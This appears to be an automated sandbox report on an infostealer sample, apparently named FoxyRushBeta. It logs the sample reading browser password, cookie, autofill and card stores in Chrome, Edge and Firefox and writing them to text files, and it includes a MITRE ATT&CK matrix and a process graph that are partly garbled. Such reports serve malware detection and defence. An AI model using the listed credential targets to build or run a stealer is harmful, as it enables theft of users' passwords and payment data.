Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Detected generic credential text file
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cards\Cards.txtJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		11
Masquerading		1
OS Credential Dumping		1
Security Software Discovery		Remote Services21
Data from Local System		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631455 Sample: bkHLzNaNMS.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 60 58 api.ipify.org 2->58 64 Suricata IDS alerts for network traffic 2->64 9 bkHLzNaNMS.exe 279 2->9         started        signatures3 process4 file5 42 C:\Users\user\AppData\...\FoxyRushBeta.exe, PE32+ 9->42 dropped 44 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 9->44 dropped 46 C:\Users\user\AppData\Local\...\System.dll, PE32 9->46 dropped 48 12 other files (none is malicious) 9->48 dropped 66 Drops large PE files 9->66 13 FoxyRushBeta.exe 20 9->13         started        signatures6 process7 dnsIp8 60 151.243.200.62, 49725, 49729, 80 RASANAIR Iran (ISLAMIC Republic Of) 13->60 62 api.ipify.org 104.26.13.205, 443, 49726 CLOUDFLARENETUS United States 13->62 50 C:\Users\user\AppData\...\cookies.sqlite-shm, data 13->50 dropped 52 C:\Users\user\AppData\Local\...\Passwords.txt, ASCII 13->52 dropped 54 C:\Users\user\AppData\Local\...\Passwords.txt, ASCII 13->54 dropped 56 5 other malicious files 13->56 dropped 68 Tries to harvest and steal browser information (history, passwords, etc) 13->68 70 Detected generic credential text file 13->70 18 cmd.exe 1 13->18         started        20 cmd.exe 1 13->20         started        22 cmd.exe 1 13->22         started        24 5 other processes 13->24 file9 signatures10 process11 process12 26 powershell.exe 15 18->26         started        28 conhost.exe 18->28         started        30 powershell.exe 15 20->30         started        32 conhost.exe 20->32         started        34 tasklist.exe 1 22->34         started        36 conhost.exe 22->36         started        38 tasklist.exe 1 24->38         started        40 conhost.exe 24->40         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.